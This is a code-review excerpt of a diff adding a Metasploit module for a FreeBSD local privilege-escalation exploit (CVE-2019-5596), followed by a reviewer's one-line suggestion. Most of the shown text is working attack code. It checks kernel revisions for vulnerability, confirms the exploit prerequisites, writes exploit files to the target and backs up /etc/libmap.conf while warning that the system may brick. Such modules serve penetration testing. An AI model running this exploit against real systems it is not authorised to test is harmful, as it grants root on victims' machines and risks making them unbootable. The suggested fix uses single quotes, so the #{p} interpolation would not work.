modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb

```diff
@@ -0,0 +1,266 @@
+  end
+
+  # Pull the exploit binary or file (.c typically) from our system
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-5596', file)
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = cmd_exec('/sbin/sysctl kern.version').split(' ')
+    major = release[2]
+    rev = Gem::Version.new(release[3].delete('r'))
+
+    if major.include? '12'
+      if major.include? 'STABLE' and rev > Gem::Version.new('343781')
+        vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+        return CheckCode::Safe
+      end
+      if major.include? 'RELEASE' and rev >= Gem::Version.new('343790')
+        vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+        return CheckCode::Safe
+      end
+    elsif major.include? '11' and (rev <= Gem::Version.new('338618') or rev >= Gem::Version.new('343786'))
+      vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+      return CheckCode::Safe
+    else
+      vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+      return CheckCode::Safe
+    end
+
+    unless file?('/etc/libmap.conf')
+      vprint_error('File /etc/libmap.conf not found, and is required for exploitation.')
+      return CheckCode::Safe
+    end
+
+    cc = has_cc?
+    if cc
+      vprint_good 'cc is installed'
+    else
+      print_error 'cc is required for compiling'
+      return CheckCode::Safe
+    end
+
+    maxfiles = cmd_exec('sysctl kern.maxfiles').split(' ')[1]
+    if maxfiles.to_i < 64303
+      vprint_error('In testing, when kern.maxfiles is < 60000 the exploit will most likely fail and reboot the system.')
+      return CheckCode::Detected #detected, it is vuln, but not exploitable from our testing, but maybe for others?
+    end
+
+    vprint_good "FreeBSD release #{major} rev r#{rev} with maxfiles #{maxfiles} is vulnerable"
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our exploit and payload to the remote system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    libmap = read_file('/etc/libmap.conf')
+    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], libmap, 'Backup of libmap.conf')
+    print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
```

Comment:
So users can find it:

```suggestion
    print_status 'Stored /etc/libmap.conf in #{p}.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
```